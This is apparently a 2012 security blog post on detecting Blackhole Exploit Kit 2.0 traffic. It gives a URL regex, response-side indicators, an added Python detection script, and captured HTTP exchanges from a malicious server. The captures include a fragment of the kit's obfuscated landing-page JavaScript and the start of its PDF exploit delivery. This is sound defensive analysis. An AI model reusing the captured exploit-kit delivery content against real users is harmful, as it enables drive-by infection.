Sunday, October 14, 2012

Blackhole Exploit Kit v2.0 URL Pattern Analysis

Written by: Frank Angiolelli, CISSP

UPDATE: 10/15/2012
Due to the high number of false positives (FPs) from Facebook, the regex is now tighter.

Continuing my series on URL patterns in exploit kits, the kit I am focused on right now is Blackhole Exploit Kit 2.0, whose URL structure follows a predictable pattern. The pattern I identified in this post appears to be BHEK 2.0. This is a running series where I am posting my intel as I go.


\.php\?\w{2,10}\=[0-9a-f]{10}\&\w{2,10}\=[a-z0-9]{2,6}\&[a-z]{2,8}\=[a-z]{2,10}\&[a-z]{2,8}\=[a-z]{2,8}$



While some of the patterns I have investigated contain more than 10 hex characters in the first parameter (in 10-character increments), the majority of these have exactly 10. If you have observations that this is hitting false positives, please leave a comment below.

Some of the interesting patterns that I have discovered here are:

  1. The initial point of contact contains an applet archive
  2. The initial get request response has the following at offset 0 "<html><head><title></title></head><body><div dqa="asd">"
  3. The response contains try/catch, try/catch, but towards the end of the body.
  4. The second and subsequent URLs (GET Requests) are a consistent match to the regex pattern above
  5. In all cases I have observed, the exploit sent was a PDF with 5 letters in the name (random name).
  6. The PDFs are served with "Content-Disposition: inline; filename="
  7. "/Index[5 1 7 1 9 4 23 4 50 " is a good layer 7 IOC in the response packets for the PDF exploit.
  8. I have observed two differently sized PDFs; I am not sure of the differences at this time.
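To show how the regex and the layer 7 observations above combine into a detection, here is an added Python example. It is not code from the post: the regex is copied from it as-is, the indicator checks are my reading of observations 1 through 7, the sample landing page and PDF fragment are constructed (a run of "A" characters stands in for the really long applet parameter value), and the "strong indicator" set and verdict thresholds are my own choices. Note that the PDF GET in the capture below does not hit the regex, because its third parameter value contains digits and is longer than the [a-z]{2,10} class allows; that request is caught by the response-side IOCs instead, which is also why a URL-only match is treated as merely suspicious (the Facebook false positives mentioned in the update are URL-only matches).

```python
import re
from typing import Dict, List

# The post's regex (tightened 10/15/2012 version). It is anchored only at the
# end, so it is applied to the request path+query with re.search().
BHEK2_URL_RE = re.compile(
    r"\.php\?\w{2,10}\=[0-9a-f]{10}\&\w{2,10}\=[a-z0-9]{2,6}"
    r"\&[a-z]{2,8}\=[a-z]{2,10}\&[a-z]{2,8}\=[a-z]{2,8}$"
)

# Layer 7 indicators taken from the observation list in the post.
LANDING_PREFIX = b'<html><head><title></title></head><body><div dqa="asd">'
PDF_INDEX_IOC = b"/Index[5 1 7 1 9 4 23 4 50 "
# Observations 5 and 6: inline disposition with a 5-character random file name.
FIVE_CHAR_PDF_RE = re.compile(r'^inline; filename="?[a-z0-9]{5}\.pdf"?$', re.I)
# Indicators strong enough on their own (my choice, not the post's).
STRONG = {"prefix_at_offset_0", "xref_index_ioc"}


def url_matches_bhek2(url: str) -> bool:
    """Request-side check: does the path+query have the BHEK 2.0 parameter shape?"""
    return BHEK2_URL_RE.search(url) is not None


def landing_page_indicators(body: bytes) -> List[str]:
    """Response-side checks for the landing page (observations 1 to 3)."""
    hits = []
    if body.startswith(LANDING_PREFIX):          # observation 2: string at offset 0
        hits.append("prefix_at_offset_0")
    if b"<applet archive=" in body:              # observation 1: applet archive
        hits.append("applet_archive")
    # Observation 3: two try/catch pairs, located towards the end of the body
    # (they come after the long applet parameter value).
    try_offsets = [m.start() for m in re.finditer(rb"try\{", body)]
    if len(try_offsets) >= 2 and try_offsets[0] > len(body) // 2:
        hits.append("late_double_try_catch")
    return hits


def pdf_response_indicators(headers: Dict[str, str], body: bytes) -> List[str]:
    """Response-side checks for the PDF delivery (observations 5 to 7)."""
    hits = []
    if headers.get("Content-Type", "").lower() == "application/pdf":
        hits.append("pdf_content_type")
    if FIVE_CHAR_PDF_RE.match(headers.get("Content-Disposition", "")):
        hits.append("inline_five_char_filename")
    if PDF_INDEX_IOC in body:                    # observation 7: xref /Index IOC
        hits.append("xref_index_ioc")
    return hits


def verdict(url: str, headers: Dict[str, str], body: bytes) -> str:
    """Combine the weak URL signal with response IOCs to limit false positives."""
    hits = set(landing_page_indicators(body) + pdf_response_indicators(headers, body))
    if hits & STRONG or (url_matches_bhek2(url) and hits):
        return "bhek2_likely"
    if url_matches_bhek2(url) or hits:
        return "suspicious"
    return "clean"


# --- constructed sample traffic, modelled on the capture in the post ---
APPLET_URL = ("/links/rules_familiar-occurred.php"
              "?cjqj=0735020b0b&zwjw=4447&pdfvomu=jpjhbwls&snguplp=nvqz")
PDF_URL = ("/links/rules_familiar-occurred.php"
           "?bklx=0735020b0b&wgaxj=43&qrfjyn=33090b0b0304080b0336&chxyb=02000200020002")
BENIGN_URL = "/profile.php?id=1234567890&tab=about"
# Landing body: known prefix, applet tag with a padded param value standing in
# for the "REALLY LONG VALUE", then a shortened version of the script tail.
LANDING_BODY = (
    LANDING_PREFIX + b'</div><applet archive="http://173.246.101.197' + APPLET_URL.encode()
    + b'" code="x"><param name="uid" value="' + b"A" * 2000 + b'">'
    b"<script>try{a^1}catch(e){try{(b+1)()}catch(f){}}</script></body></html>"
)
PDF_HEADERS = {"Content-Type": "application/pdf",
               "Content-Disposition": "inline; filename=2a34b.pdf"}
PDF_BODY = (b"%PDF-1.6\n52 0 obj<</Length 4321/Root 1 0 R/Filter/FlateDecode"
            b"/W[1 2 1]/Index[5 1 7 1 9 4 23 4 50 3]>>stream\n")

if __name__ == "__main__":
    html = {"Content-Type": "text/html"}
    print("applet request :", verdict(APPLET_URL, html, LANDING_BODY))
    print("pdf request    :", verdict(PDF_URL, PDF_HEADERS, PDF_BODY))
    print("benign request :", verdict(BENIGN_URL, html, b"<html></html>"))
```

Run it as a script to see the three verdicts; in a proxy or IDS log pipeline the same functions would be fed the request line, the response headers and the first few kilobytes of the body. The regex alone stays a triage signal because any PHP endpoint with four short parameters of the right shape will match it; the offset 0 string and the /Index IOC are what actually distinguish this kit.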

Request:

GET /links/rules_familiar-occurred.php HTTP/1.1
Accept: */*
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Accept-Encoding: gzip, deflate
Host: 173.246.101.197
Connection: Keep-Alive

Response:

HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Sun, 14 Oct 2012 19:52:42 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.3.14-1~dotdeb.0

509

<html><head><title></title></head><body><div dqa="asd"></div><applet archive="http://173.246.101.197/links/rules_familiar-occurred.php?cjqj=0735020b0b&zwjw=4447&pdfvomu=jpjhbwls&snguplp=nvqz" code="vwqfqwfea"><param name="&#00117;&#105;&#100;" value=' < REALLY LONG VALUE>

</u><script>

if(020==0x10)d=document;
try{fsdsb^32}catch(gdsgsd){try{(d+"523")()}catch(dsgdsg){a=d[g](ggg);}}
s="";
for(i=0;;i++){
.window.asd2();
.if(r){s=s+r;}else break;
}
a=s;
s="";
k="";
asd3();
qa=0x1d;
for(i=0;i<a.length;i+=2){
.s+=ss(p(a[sss](i,2),qa));


if(021==0x11)asd();

..</script></body></html>

0


Request:

GET /links/rules_familiar-occurred.php?bklx=0735020b0b&wgaxj=43&qrfjyn=33090b0b0304080b0336&chxyb=02000200020002 HTTP/1.1
Accept: application/x-shockwave-flash, image/gif, image/jpeg, image/pjpeg, */*
Referer: http://173.246.101.197/links/rules_familiar-occurred.php
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Accept-Encoding: gzip, deflate
Host: 173.246.101.197
Connection: Keep-Alive

Response:

HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Sun, 14 Oct 2012 19:52:47 GMT
Content-Type: application/pdf
Connection: keep-alive
Content-Length: 13388
X-Powered-By: PHP/5.3.14-1~dotdeb.0
Accept-Ranges: bytes
Content-Disposition: inline; filename=2a34b.pdf



%PDF-1.6
%....

52 0 obj<</Length 4321/Root 1 0 R/Info 3 0 R/Filter/FlateDecode/W[1 2 1]/Index[5 1 7 1 9 4 23 4 50 3]>>stream

x.bbb0b`b```.G0.....!...w.310Z...2....w...



References:
http://jsunpack.jeek.org/dec/go?report=77b050856d601de7dd7df086d4cf2c03d5043464
http://securityanalyst.co/blackhole-2-0-exploit-kit-pcap-download-wireshark-tcpdump-traffic-analysis/
http://fortknoxnetworks.blogspot.com/2012/10/url-patterns-emerging-in-new-threats.html
http://jsunpack.jeek.org/dec/go?report=43231d144a88024f6a4bdb6a890c7d51148cfae2
http://labs.vericon.li/2012/10/exploitjsblacole-gb-infection-explained-with-source-code/
http://jsunpack.jeek.org/?report=bcf3b47db058c9a6406ca55e1758d0c01790683b
http://pastebin.com/iCfC5kzY (Credit to @MALWAREMUSTDIE)
http://jsunpack.jeek.org/dec/go?report=8ec366564ae09ff7488554fffc03ad518fb5c591

